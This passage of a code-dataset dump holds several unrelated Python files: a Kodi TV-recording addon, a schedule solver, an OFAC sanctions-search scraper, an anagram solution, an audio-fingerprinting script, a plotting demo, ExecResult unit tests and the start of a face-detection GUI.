dict(label=tr(TR_SEARCH_BROADCASTS), path=plugin.url_for('page_search')),\n ]\n return finish(items)\n\n\n@plugin.route('/pvr')\ndef page_pvr():\n def producer():\n if recorded:\n yield dict(label=tr(TR_X_BROADCASTS_RECORDED, len(recorded)), path=plugin.url_for('page_pvr_recorded'))\n yield dict(label=tr(TR_MANAGE_X_BROADCASTS, len(recordings)), path=plugin.url_for('page_pvr_manage'))\n\n recordings = sorted(get_recordings(), key=operator.attrgetter('starts_at'))\n recorded = [recording for recording in recordings if recording.is_recorded()]\n if recordings:\n return finish(tuple(producer()))\n else:\n update_view(plugin.url_for('page_index'), msg=tr(TR_NO_RECORDINGS_FOUND))\n\n\n@plugin.route('/pvr/recorded')\ndef page_pvr_recorded():\n def producer():\n for recorded_recording in recorded:\n yield new_recording_item(recorded_recording)\n\n recordings = sorted(get_recordings(), key=operator.attrgetter('starts_at'))\n recorded = [recording for recording in recordings if recording.is_recorded()]\n if recorded:\n return finish(tuple(producer()), content_type='movies', view_mode_id=504)\n else:\n update_view(plugin.url_for('page_pvr'), msg=tr(TR_NO_RECORDINGS_FOUND))\n\n\n@plugin.route('/pvr/manage')\ndef page_pvr_manage():\n def producer():\n for recording in recordings:\n path = plugin.url_for('action_delete_recording', recording_id=recording.recording_id,\n recording_title=normalize_title(recording, include_time=False))\n yield new_recording_item(recording, path=path, include_channel_name=True)\n\n recordings = sorted(get_recordings(), key=operator.attrgetter('starts_at'))\n if recordings:\n return finish(tuple(producer()), content_type='movies', view_mode_id=504)\n else:\n update_view(plugin.url_for('page_pvr'), msg=tr(TR_NO_RECORDINGS_FOUND))\n\n\n@plugin.route('/action/delete-recording//')\ndef action_delete_recording(recording_id, recording_title):\n if 
xbmcgui.Dialog().yesno(tr(TR_TITLE_DELETE_RECORDING), tr(TR_DELETE_RECORDING, recording_title)):\n try:\n new_pvr().delete_recording(int(recording_id))\n except pybongtvapi.Error:\n refresh_view(msg=tr(TR_CANNOT_DELETE_RECORDING, recording_title))\n else:\n refresh_view(msg=tr(TR_RECORDING_DELETED, recording_title))\n\n\n@plugin.route('/action/create-recording//')\ndef action_create_recording(broadcast_id, broadcast_title):\n if xbmcgui.Dialog().yesno(tr(TR_TITLE_RECORD_BROADCAST), tr(TR_RECORD_BROADCAST, broadcast_title)):\n try:\n recording = new_pvr().create_recording(int(broadcast_id))\n assert isinstance(recording, pybongtvapi.Recording)\n except (pybongtvapi.Error, AssertionError):\n refresh_view(msg=tr(TR_CANNOT_RECORD_BROADCAST, broadcast_title))\n else:\n notify(tr(TR_WILL_RECORD_BROADCAST, broadcast_title))\n\n@plugin.route('/epg')\ndef page_epg():\n def producer():\n for channel in get_channels():\n yield new_channel_item(channel, path=plugin.url_for('page_epg_channel', channel_id=channel.channel_id,\n offset=0))\n items = tuple(producer())\n return finish(items)\n\n\n@plugin.route('/epg//')\ndef page_epg_channel(channel_id, offset):\n def producer():\n channel = get_channel(channel_id)\n broadcasts = channel.get_broadcasts_per_day(offset=int(offset))\n for broadcast in broadcasts:\n path = plugin.url_for('action_create_recording', broadcast_id=broadcast.broadcast_id,\n broadcast_title=normalize_title(broadcast, include_time=False))\n yield new_broadcast_item(broadcast, path=path)\n if broadcasts:\n time.time() + (int(offset) + 1)\n next_day = time.strftime('%d.%m.', time.localtime(time.time() + ((int(offset) + 1) * 3600 * 24)))\n next_day_label = tr(TR_NEXT_DAYS_BROADCASTS, next_day)\n yield dict(label=next_day_label, path=plugin.url_for('page_epg_channel', channel_id=channel_id,\n offset=int(offset) + 1))\n if int(offset) >= 1:\n time.time() + (int(offset) + 1)\n previous_day = time.strftime('%d.%m.', time.localtime(time.time() + ((int(offset) - 1) * 3600 * 24)))\n previous_day_label = tr(TR_PREVIOUS_DAYS_BROADCASTS, previous_day)\n yield dict(label=previous_day_label, path=plugin.url_for('page_epg_channel', channel_id=channel_id,\n offset=int(offset) - 1))\n yield dict(label=tr(TR_LIST_OF_BROADCASTS), path=plugin.url_for('page_epg'))\n items = tuple(producer())\n return finish(items, content_type=MOVIES)\n\n@plugin.route('/search')\ndef page_search():\n def producer():\n for broadcast in new_epg().search_broadcasts(search_pattern):\n path = plugin.url_for('action_create_recording', broadcast_id=broadcast.broadcast_id,\n broadcast_title=normalize_title(broadcast, include_time=True,\n include_channel_name=True))\n yield new_broadcast_item(broadcast, path=path, include_time=True, include_channel_name=True)\n\n search_pattern = (plugin.keyboard(heading=tr(TR_TITLE_SEARCH_MATCHING_BROADCASTS)) or '').strip()\n if search_pattern:\n items = tuple(producer())\n if items:\n notify(tr(TR_X_MATCHING_BROADCASTS_FOUND, len(items), search_pattern))\n return finish(items, content_type='movies', view_mode_id=504)\n else:\n refresh_view(msg=tr(TR_NO_MATCHING_BROADCASTS_FOUND, search_pattern))\n\n\nif __name__ == '__main__':\n plugin.run()\n","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":14604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"197730963","text":"#turn minutes in military time and it'll be pretty much finished\n\ndef get_start_time(schedules, duration):\n\tprint(schedules, 
duration)\n\tmilitaryTime, freeTime = (duration/60)*100+duration%60, [[],[],[],[],[],[],[]]\n\tfor x in range(len(schedules)):\n\t\ttry:\n\t\t\tif schedules[x][0][0]!='09:00' and int(schedules[x][0][0].replace(':',''))-900>=militaryTime:\n\t\t\t\tfreeTime[x].insert(0,[900, int(schedules[x][0][0].replace(':',''))])\n\t\texcept: pass\n\t\tfor key, char in enumerate(schedules[x]):\n\t\t\ttry:\t\t\t\t\n\t\t\t\tif int(schedules[x][key+1][0].replace(':',''))-int(schedules[x][key][1].replace(':',''))>=militaryTime:\n\t\t\t\t\tfreeTime[x].append([int(schedules[x][key][1].replace(':','')), int(schedules[x][key+1][0].replace(':',''))])\n\t\t\texcept IndexError:\n\t\t\t\tif 1900-int(schedules[x][key][1].replace(':',''))>=militaryTime: \n\t\t\t\t\tfreeTime[x].append([int(schedules[x][key][1].replace(':','')),int('1900')])\n\tprint('\\n\\n\\n')\n\tfor x in freeTime: print(x)\n\tfor key, char in enumerate(freeTime[0]):\n\t\tstart, end = min(char), max(char)\n\t\tcount, answer = 1, [min(char)]\n\t\twhile count!=len(schedules):\n\t\t\tfor i in freeTime[count]:\n\t\t\t\tif min(i)>=min(answer) and min(i)<=end:\n\t\t\t\t\tstart = min(i)\n\t\t\t\t\tanswer.append(start)\n\t\t\t\tif max(i) <= end and max(i)>=start:\n\t\t\t\t\tend = max(i)\n\t\t\t\tif start in range(min(i),max(i)+1) and min(i)<=end:\n\t\t\t\t\tanswer.append(min(i))\n\t\t\tcount+=1\n\t\tif len(answer)>=len(schedules):\n\t\t\tprint(end, start)\n\t\t\ttry:\n\t\t\t\tif end-start >= militaryTime: \n\t\t\t\t\tif start>1000:\n\t\t\t\t\t\treturn str(max(answer))[:2]+':'+str(max(answer))[2:]\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn '0'+str(max(answer))[:1]+':'+str(max(answer))[1:]\n\t\t\t\telse: pass\n\t\t\texcept UnboundLocalError: return None\n\t\tcount = 1\n\nschedules = [\n[['09:09', '11:27'], ['12:14', '13:41'], ['15:16', '17:17'], ['17:32', '18:50']], [['10:38', '12:06'], ['13:39', '15:08'], ['17:23', '17:26'], ['18:02', '18:26']]\n]\n\nprint(get_start_time(schedules, 11))\n\n\n\n\n\n\n\n\n\n","sub_path":"smallProjects/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"598067323","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\ndef getresultsaftersearch(form_dict):\r\n #create a browser instance and wait instance on browser for 10 sec\r\n browser = webdriver.Chrome('./chromedriver')\r\n wait = WebDriverWait(browser, 10)\r\n browser.get('https://sanctionssearch.ofac.treas.gov/')\r\n\r\n # waiting for the page to be loaded\r\n wait.until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"ctl00_MainContent_ddlType\"]')))\r\n\r\n # try entering the given values to the page\r\n try:\r\n #select the given Type from the list or else All will be selected by default\r\n select = Select(browser.find_element_by_id('ctl00_MainContent_ddlType'))\r\n select.select_by_visible_text(form_dict['Type'])\r\n #Enter the Address if given\r\n form_dict.get('Address') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtAddress\").send_keys(form_dict['Address'])\r\n #Enter the given Full name\r\n browser.find_element_by_id(\"ctl00_MainContent_txtLastName\").send_keys(form_dict['Name'])\r\n 
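# (Aside, not part of the original getresults.py.) The surrounding lines all
# repeat one pattern: type into a form field only when the caller supplied a
# value. A hypothetical helper, with an invented name, could collapse them;
# this is a sketch only, reusing the element IDs already present above:
#
#     def fill_if_present(browser, element_id, value):
#         # Silently skip optional fields that were not supplied.
#         if value is not None:
#             browser.find_element_by_id(element_id).send_keys(value)
#
#     fill_if_present(browser, "ctl00_MainContent_txtCity", form_dict.get('City'))
#     fill_if_present(browser, "ctl00_MainContent_txtState", form_dict.get('State'))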
#Enter the City if given\r\n form_dict.get('City') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtCity\").send_keys(form_dict['City'])\r\n #Enter the ID Field if given\r\n form_dict.get('ID_Field') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtID\").send_keys(form_dict['ID_Field'])\r\n #Enter the State if given\r\n form_dict.get('State') is not None and browser.find_element_by_id(\"ctl00_MainContent_txtState\").send_keys(form_dict['State'])\r\n #Choose multiple Program values if given\r\n if form_dict.get('Program') is not None:\r\n programs = list()\r\n programs.append(form_dict.get('Program'))\r\n for val in programs:\r\n path = \"//select[@name='ctl00$MainContent$lstPrograms']/option[text()='\" + val + \"']\"\r\n browser.find_element_by_xpath(path).click()\r\n #Select the Country if given or else All will be selected by default\r\n select = Select(browser.find_element_by_id('ctl00_MainContent_ddlCountry'))\r\n select.select_by_visible_text(form_dict['Country'])\r\n #Select the List if given or else All will be selected by default\r\n select = Select(browser.find_element_by_id('ctl00_MainContent_ddlList'))\r\n select.select_by_visible_text(form_dict['List'])\r\n #Clear the minimum name score and enter the given value\r\n browser.find_element_by_id(\"ctl00_MainContent_Slider1_Boundcontrol\").send_keys(Keys.BACKSPACE, Keys.BACKSPACE, Keys.BACKSPACE)\r\n browser.find_element_by_id(\"ctl00_MainContent_Slider1_Boundcontrol\").send_keys(str(form_dict['MinNameScore']))\r\n\r\n except Exception:\r\n raise Exception('Please enter the correct values for the fields')\r\n\r\n\r\n #click on submit if everything is good\r\n browser.find_element_by_id(\"ctl00_MainContent_btnSearch\").click()\r\n\r\n\r\n #wait for the results to show if any and collect the results\r\n try:\r\n wait.until(EC.presence_of_element_located((By.ID, 'gvSearchResults')))\r\n except NoSuchElementException: # except needs the exception class; the original instantiated it, which would raise a TypeError at catch time\r\n res=list()\r\n res.append({'results' : None})\r\n return res\r\n else:\r\n res=list()\r\n table_id = browser.find_element(By.ID, 'gvSearchResults')\r\n rows = table_id.find_elements(By.TAG_NAME, \"tr\") # get all of the rows in the table\r\n for row in rows:\r\n cells = row.find_elements(By.TAG_NAME, \"td\")\r\n if len(cells) < 6: # skip the header row (th cells) and any malformed rows\r\n continue\r\n d = {\r\n 'Name': cells[0].text,\r\n 'Address': cells[1].text,\r\n 'Type': cells[2].text,\r\n 'Programs': cells[3].text,\r\n 'List': cells[4].text,\r\n 'Score': cells[5].text\r\n }\r\n res.append(d)\r\n\r\n return res","sub_path":"crawlthesite/getresults.py","file_name":"getresults.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"653560240","text":"# coding=utf-8\r\n\r\n\"\"\"\r\n242. Valid Anagram\r\nGiven two strings s and t, write a function to determine if t is an anagram of s.\r\n\r\nFor example,\r\ns = \"anagram\", t = \"nagaram\", return true.\r\ns = \"rat\", t = \"car\", return false.\r\n\r\nNote:\r\nYou may assume the string contains only lowercase alphabets.\r\n\r\nFollow up:\r\nWhat if the inputs contain unicode characters? 
How would you adapt your solution to such case?\r\n\"\"\"\r\n\r\n\r\nclass Solution(object):\r\n def isAnagram(self, s, t):\r\n \"\"\"\r\n :type s: str\r\n :type t: str\r\n :rtype: bool\r\n \"\"\"\r\n if s is None or t is None:\r\n return False\r\n # if len(s) == 0 and len(t) == 0:\r\n # return True\r\n\r\n dict_s = {}\r\n alphabets = \"abcdefghijklmnopqrstuvwxyz\"\r\n for item in alphabets:\r\n dict_s[item] = 0\r\n for item in s:\r\n dict_s[item] = dict_s[item] + 1\r\n for item in t:\r\n dict_s[item] -= 1\r\n for key in dict_s.keys():\r\n if dict_s[key] != 0:\r\n return False\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n print (Solution().isAnagram(\"a\", \"ab\"))\r\n","sub_path":"zishell/solution/easy/solution242_isAnagram.py","file_name":"solution242_isAnagram.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624409981","text":"import argparse\nimport json\nimport sys\nimport os\nfrom argparse import RawTextHelpFormatter\nfrom os.path import isdir\nimport glob\nimport librosa\nimport soundfile as sf\n\nfrom dejavu import Dejavu\nfrom dejavu.logic.recognizer.file_recognizer import FileRecognizer\nfrom dejavu.logic.recognizer.microphone_recognizer import MicrophoneRecognizer\n\nDEFAULT_CONFIG_FILE = \"dejavu.cnf.DOCKER\"\n\n\ndef init(configpath):\n \"\"\"\n Load config from a JSON file\n \"\"\"\n try:\n with open(configpath) as f:\n config = json.load(f)\n except IOError as err:\n print(f\"Cannot open configuration: {str(err)}. Exiting\")\n sys.exit(1)\n\n # create a Dejavu instance\n return Dejavu(config)\n\n\ndef split_track(path_to_track, path_to_folder_save):\n if not os.path.exists(path_to_folder_save):\n os.mkdir(path_to_folder_save)\n file_name = path_to_track.split('/')[-1]\n loaded_track, sr = librosa.load(path_to_track, sr=44100)\n # sr, loaded_track = wavfile.read(path_to_track)\n duration = len(loaded_track) / sr\n print(f\"Duration track: {duration}\")\n duration_10 = int(duration // 10)\n for i in range(duration_10):\n os.system(\n f'ffmpeg -i \"{path_to_track}\" -ss {i * 10} -to {i * 10 + 10} -c copy \"{path_to_folder_save}/10sec_{i}_{file_name}\" -n -hide_banner -loglevel error')\n return path_to_folder_save\n\n\ndef change_sample_rate_file(path_to_file, SR=44100, CHANNELS=1):\n file_dir = os.path.join(*path_to_file.split('/')[:-1])\n file_name = path_to_file.split('/')[-1]\n if not file_name.startswith(\"sr44100_ch1\") or not file_name.startswith(\"10sec_\"):\n new_directory = os.path.join(file_dir, \"sr44100_ch1\")\n if not os.path.exists(new_directory):\n os.mkdir(new_directory)\n loaded_track, sr = librosa.load(path_to_file, sr=SR)\n if file_name.endswith(\"mp3\"):\n file_name = file_name[:-3] + 'wav'\n new_file_path = f'{new_directory}/sr44100_ch1_{file_name}'\n sf.write(new_file_path, loaded_track, sr)\n return new_file_path\n return path_to_file\n\n\ndef change_sample_rate_folder(path_to_folder, SR=44100, CHANNELS=1):\n if path_to_folder.split('/')[-1] in [\"sr44100_ch1\", \"music_slices_sr44100_ch1\"]:\n return path_to_folder\n new_folder = os.path.join(path_to_folder, \"sr44100_ch1\")\n if not os.path.exists(new_folder):\n os.mkdir(new_folder)\n data_files = glob.glob(path_to_folder+\"/*.wav\") + glob.glob(path_to_folder+\"/*.mp3\")\n data_files_sr44100_ch1 = glob.glob(new_folder + \"/*.wav\")\n for i in range(len(data_files_sr44100_ch1)):\n data_files_sr44100_ch1[i] = data_files_sr44100_ch1[i].split('/')[-1][12:-3]\n for track in data_files:\n 
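# (Clarifying comments, not in the original mine_dejavu.py.) Each track that
# is not yet converted gets loaded at 44.1 kHz; librosa.load also downmixes
# to mono by default, which is what the sr44100_ch1 naming promises. The
# [12:-3] slice above strips the 12-character "sr44100_ch1_" prefix and the
# 3-letter extension, so the membership check below compares bare file names
# (both sides keep the trailing dot).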
file_name = track.split('/')[-1]\n if file_name[:-3] in data_files_sr44100_ch1:\n continue\n loaded_track, sr = librosa.load(track, sr=SR)\n if file_name.endswith(\"mp3\"):\n file_name = file_name[:-3] + 'wav'\n sf.write(f'{new_folder}/sr44100_ch1_{file_name}', loaded_track, sr)\n return new_folder\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Dejavu: Audio Fingerprinting library\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('-c', '--config', nargs='?',\n help='Path to configuration file\\n'\n 'Usages: \\n'\n '--config /path/to/config-file\\n')\n parser.add_argument('-f', '--fingerprint', nargs=2,\n help='Fingerprint files in a directory\\n'\n 'Usages: \\n' \n '--fingerprint folder /path/to/directory')\n parser.add_argument('-r', '--recognize', nargs=2,\n help='Recognize what is '\n 'playing through the microphone or in a file.\\n'\n 'Usage: \\n'\n '--recognize mic number_of_seconds \\n'\n '--recognize file path/to/file \\n'\n '--recognize folder path/to/directory \\n')\n parser.add_argument('-s', '--split', nargs=2,\n help='Split by 10 sec to folder music_slices \\n' \n 'Usage: \\n'\n '--split file path/to/file \\n'\n '--split folder path/to/directory \\n')\n args = parser.parse_args()\n\n if not args.fingerprint and not args.recognize and not args.split:\n parser.print_help()\n sys.exit(0)\n\n config_file = args.config\n if config_file is None:\n config_file = DEFAULT_CONFIG_FILE\n\n djv = init(config_file)\n if args.fingerprint:\n # Fingerprint all files in a directory\n if len(args.fingerprint) == 2:\n directory = args.fingerprint[1]\n new_directory = change_sample_rate_folder(directory)\n\n print(f\"Fingerprinting all .wav and .mp3 files in the {new_directory} directory\")\n djv.fingerprint_directory(new_directory, [\".wav\"], 4)\n djv.fingerprint_directory(new_directory, [\".mp3\"], 4)\n\n else:\n print(f\"Something wrong with arguments\")\n\n elif args.recognize:\n # Recognize audio source\n songs = None\n source = args.recognize[0]\n opt_arg = args.recognize[1]\n\n if source in ('mic', 'microphone'):\n songs = djv.recognize(MicrophoneRecognizer, seconds=opt_arg)[0][0]\n print(f'For micro track:')\n print(f'\\tIt is {songs[\"song_name\"]}. \\t\\t\\tConfidence: {int(songs[\"input_confidence\"] * 100)}%')\n elif source == 'file':\n new_path_file = change_sample_rate_file(opt_arg)\n songs = djv.recognize(FileRecognizer, new_path_file)\n print(f'\\tIt is {songs[\"results\"][0][\"song_name\"]}. \\t\\t\\tConfidence: {int(songs[\"results\"][0][\"input_confidence\"] * 100)}%')\n elif source == 'folder':\n new_directory = change_sample_rate_folder(opt_arg)\n data_wav_files = glob.glob(new_directory + \"/*.wav\")\n data_mp3_files = glob.glob(new_directory + \"/*.mp3\")\n data_files = data_wav_files + data_mp3_files\n for file_path in data_files:\n songs = djv.recognize(FileRecognizer, file_path)\n print(f'For track {file_path.split(\"/\")[-1]}:')\n print(f'\\tIt is {songs[\"results\"][0][\"song_name\"]}. 
\\t\\t\\tConfidence: {int(songs[\"results\"][0][\"input_confidence\"] * 100)}%')\n\n elif args.split:\n # Split audio source\n source = args.split[0]\n opt_arg = args.split[1]\n path_to_folder_save = \"music_slices_sr44100_ch1\"\n\n if source == 'file':\n if not opt_arg.startswith(\"sr44100_ch1\"):\n opt_arg = change_sample_rate_file(opt_arg)\n split_track(opt_arg, path_to_folder_save)\n elif source == 'folder':\n data_dir = opt_arg\n if data_dir.split('/')[-1] != \"sr44100_ch1\":\n data_dir = change_sample_rate_folder(data_dir)\n data_files = glob.glob(data_dir + \"/*.wav\") + glob.glob(data_dir + \"/*.mp3\")\n for track in data_files:\n split_track(track, path_to_folder_save)\n","sub_path":"mine_dejavu.py","file_name":"mine_dejavu.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554607350","text":"#%%\nimport matplotlib.pyplot as plt\n\nplt.style.use('fivethirtyeight')\n\n\nx_values = [1,2,3,4,5]\ny_values = [1,4,9,16,25]\n\n\nfig, ax = plt.subplots()\nax.scatter(x_values, y_values, s=150)\n\n# Set the title chart and label axis.\nax.set_title('Squares scatter plot.', fontsize = 25)\nax.set_xlabel(\"Value\", fontsize =15)\nax.set_ylabel(\"Square of Value\", fontsize =15)\n\n\n# Change the sixe of ticks in label.\nax.tick_params(axis='both', which = 'major',labelsize=15)\n\n\nplt.show()\n\n# %%\n","sub_path":"generating_data/scatter_squares.py","file_name":"scatter_squares.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"304873940","text":"# Copyright 2018 Alexey Stepanov aka penguinolog.\n\n# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n# pylint: disable=no-self-use\n\nimport unittest\n\nimport mock\n\nimport exec_helpers\n\n\ncmd = \"ls -la | awk '{print $1}'\"\n\n\n# noinspection PyTypeChecker\nclass TestExecResult(unittest.TestCase):\n @mock.patch(\"exec_helpers.exec_result.logger\")\n def test_create_minimal(self, logger):\n \"\"\"Test defaults\"\"\"\n result = exec_helpers.ExecResult(cmd=cmd)\n self.assertEqual(result.cmd, cmd)\n self.assertEqual(result.cmd, result[\"cmd\"])\n self.assertEqual(result.stdout, ())\n self.assertEqual(result.stdout, result[\"stdout\"])\n self.assertEqual(result.stderr, ())\n self.assertEqual(result.stderr, result[\"stderr\"])\n self.assertEqual(result.stdout_bin, bytearray())\n self.assertEqual(result.stderr_bin, bytearray())\n self.assertEqual(result.stdout_str, \"\")\n self.assertEqual(result.stdout_str, result[\"stdout_str\"])\n self.assertEqual(result.stderr_str, \"\")\n self.assertEqual(result.stderr_str, result[\"stderr_str\"])\n self.assertEqual(result.stdout_brief, \"\")\n self.assertEqual(result.stdout_brief, result[\"stdout_brief\"])\n self.assertEqual(result.stderr_brief, \"\")\n self.assertEqual(result.stderr_brief, result[\"stderr_brief\"])\n self.assertEqual(result.exit_code, exec_helpers.ExitCodes.EX_INVALID)\n self.assertEqual(result.exit_code, result[\"exit_code\"])\n self.assertEqual(\n repr(result),\n \"{cls}(cmd={cmd!r}, stdout={stdout}, stderr={stderr}, \"\n \"exit_code={exit_code!s})\".format(\n cls=exec_helpers.ExecResult.__name__,\n cmd=cmd,\n stdout=(),\n stderr=(),\n exit_code=exec_helpers.ExitCodes.EX_INVALID,\n ),\n )\n self.assertEqual(\n str(result),\n \"{cls}(\\n\\tcmd={cmd!r},\"\n \"\\n\\t stdout=\\n'{stdout_brief}',\"\n \"\\n\\tstderr=\\n'{stderr_brief}', \"\n \"\\n\\texit_code={exit_code!s}\\n)\".format(\n cls=exec_helpers.ExecResult.__name__,\n cmd=cmd,\n stdout_brief=\"\",\n stderr_brief=\"\",\n exit_code=exec_helpers.ExitCodes.EX_INVALID,\n ),\n )\n\n with self.assertRaises(IndexError):\n # noinspection PyStatementEffect\n result[\"nonexistent\"] # pylint: disable=pointless-statement\n\n with self.assertRaises(exec_helpers.ExecHelperError):\n # noinspection PyStatementEffect\n result[\"stdout_json\"] # pylint: disable=pointless-statement\n logger.assert_has_calls(\n (\n mock.call.exception(\n \"{cmd} stdout is not valid json:\\n\" \"{stdout_str!r}\\n\".format(cmd=cmd, stdout_str=\"\")\n ),\n )\n )\n self.assertIsNone(result[\"stdout_yaml\"])\n\n self.assertEqual(\n hash(result), hash((exec_helpers.ExecResult, cmd, None, (), (), exec_helpers.ExitCodes.EX_INVALID))\n )\n\n @mock.patch(\"exec_helpers.exec_result.logger\", autospec=True)\n def test_not_implemented(self, logger):\n \"\"\"Test assertion on non implemented deserializer\"\"\"\n result = exec_helpers.ExecResult(cmd=cmd)\n deserialize = getattr(result, \"_ExecResult__deserialize\")\n with self.assertRaises(NotImplementedError):\n deserialize(\"tst\")\n logger.assert_has_calls((mock.call.error(\"{fmt} deserialize target is not implemented\".format(fmt=\"tst\")),))\n\n def test_setters(self):\n result = exec_helpers.ExecResult(cmd=cmd)\n self.assertEqual(result.exit_code, exec_helpers.ExitCodes.EX_INVALID)\n\n tst_stdout = [b\"Test\\n\", b\"long\\n\", b\"stdout\\n\", b\"data\\n\", b\" \\n\", b\"5\\n\", b\"6\\n\", b\"7\\n\", b\"8\\n\", b\"end!\\n\"]\n\n tst_stderr = [b\"test\\n\"] * 10\n\n with mock.patch(\"exec_helpers.exec_result.logger\", autospec=True):\n result.read_stdout(tst_stdout)\n 
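# read_stdout records the raw byte lines; attribute access and item access should return the same data\n 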
self.assertEqual(result.stdout, tuple(tst_stdout))\n self.assertEqual(result.stdout, result[\"stdout\"])\n\n with mock.patch(\"exec_helpers.exec_result.logger\", autospec=True):\n result.read_stderr(tst_stderr)\n self.assertEqual(result.stderr, tuple(tst_stderr))\n self.assertEqual(result.stderr, result[\"stderr\"])\n\n with self.assertRaises(TypeError):\n result.exit_code = \"code\"\n\n result.exit_code = 0\n self.assertEqual(result.exit_code, 0)\n self.assertEqual(result.exit_code, result[\"exit_code\"])\n\n with self.assertRaises(RuntimeError):\n result.exit_code = 1\n\n self.assertEqual(result.exit_code, 0)\n\n self.assertEqual(result.stdout_bin, bytearray(b\"\".join(tst_stdout)))\n self.assertEqual(result.stderr_bin, bytearray(b\"\".join(tst_stderr)))\n\n stdout_br = tst_stdout[:3] + [b\"...\\n\"] + tst_stdout[-3:]\n stderr_br = tst_stderr[:3] + [b\"...\\n\"] + tst_stderr[-3:]\n\n stdout_brief = b\"\".join(stdout_br).strip().decode(encoding=\"utf-8\")\n stderr_brief = b\"\".join(stderr_br).strip().decode(encoding=\"utf-8\")\n\n self.assertEqual(result.stdout_brief, stdout_brief)\n self.assertEqual(result.stderr_brief, stderr_brief)\n\n def test_json(self):\n result = exec_helpers.ExecResult(\"test\", stdout=[b'{\"test\": true}'])\n self.assertEqual(result.stdout_json, {\"test\": True})\n\n @mock.patch(\"exec_helpers.exec_result.logger\", autospec=True)\n def test_wrong_result(self, logger):\n \"\"\"Test logging exception if stdout if not a correct json\"\"\"\n cmd = r\"ls -la | awk '{print $1\\}'\"\n result = exec_helpers.ExecResult(cmd=cmd)\n with self.assertRaises(exec_helpers.ExecHelperError):\n # noinspection PyStatementEffect\n result.stdout_json # pylint: disable=pointless-statement\n logger.assert_has_calls(\n (\n mock.call.exception(\n \"{cmd} stdout is not valid json:\\n\" \"{stdout_str!r}\\n\".format(cmd=cmd, stdout_str=\"\")\n ),\n )\n )\n self.assertIsNone(result[\"stdout_yaml\"])\n\n def test_not_equal(self):\n \"\"\"Exec result equality is validated by all fields.\"\"\"\n result1 = exec_helpers.ExecResult(\"cmd1\")\n result2 = exec_helpers.ExecResult(\"cmd2\")\n self.assertNotEqual(result1, result2)\n\n result1 = exec_helpers.ExecResult(cmd)\n result2 = exec_helpers.ExecResult(cmd)\n result1.read_stdout([b\"a\"])\n result2.read_stdout([b\"b\"])\n self.assertNotEqual(result1, result2)\n\n result1 = exec_helpers.ExecResult(cmd)\n result2 = exec_helpers.ExecResult(cmd)\n result1.read_stderr([b\"a\"])\n result2.read_stderr([b\"b\"])\n self.assertNotEqual(result1, result2)\n\n result1 = exec_helpers.ExecResult(cmd)\n result2 = exec_helpers.ExecResult(cmd)\n result1.exit_code = 0\n result2.exit_code = 1\n self.assertNotEqual(result1, result2)\n\n def test_finalize(self):\n \"\"\"After return code, no stdout/stderr/new code can be received.\"\"\"\n result = exec_helpers.ExecResult(cmd)\n result.exit_code = 0\n\n with self.assertRaises(RuntimeError):\n result.exit_code = 1\n\n with self.assertRaises(RuntimeError):\n result.read_stdout([b\"out\"])\n\n with self.assertRaises(RuntimeError):\n result.read_stderr([b\"err\"])\n\n def test_stdin_none(self):\n result = exec_helpers.ExecResult(cmd, exit_code=0)\n self.assertIsNone(result.stdin)\n\n def test_stdin_utf(self):\n result = exec_helpers.ExecResult(cmd, stdin=\"STDIN\", exit_code=0)\n self.assertEqual(result.stdin, \"STDIN\")\n\n def test_stdin_bytes(self):\n result = exec_helpers.ExecResult(cmd, stdin=b\"STDIN\", exit_code=0)\n self.assertEqual(result.stdin, \"STDIN\")\n\n def test_stdin_bytearray(self):\n result = 
exec_helpers.ExecResult(cmd, stdin=bytearray(b\"STDIN\"), exit_code=0)\n self.assertEqual(result.stdin, \"STDIN\")\n","sub_path":"test/test_exec_result.py","file_name":"test_exec_result.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"40261742","text":"import brightness\nimport tkinter\nfrom PIL.Image import preinit\nfrom PIL import Image\nimport cv2\nimport PIL.Image\nimport PIL.ImageTk\nimport time\nimport dlib\nfrom numpy.core import shape_base\nfrom numpy.core.fromnumeric import shape\nimport numpy as np\nimport imutils\nfrom scipy import spatial\nfrom scipy.spatial import distance as dist\nfrom imutils import face_utils\n\n\nclass App:\n def __init__(self, window, window_title, video_source=0):\n self.window = window\n self.window.title(window_title)\n self.video_source = video_source\n self.predictor_path = 'C:/Users/manis/Documents/opencv/Detectors/shape_predictor_68_face_landmarks.dat'\n self.predictor = dlib.shape_predictor(self.predictor_path)\n 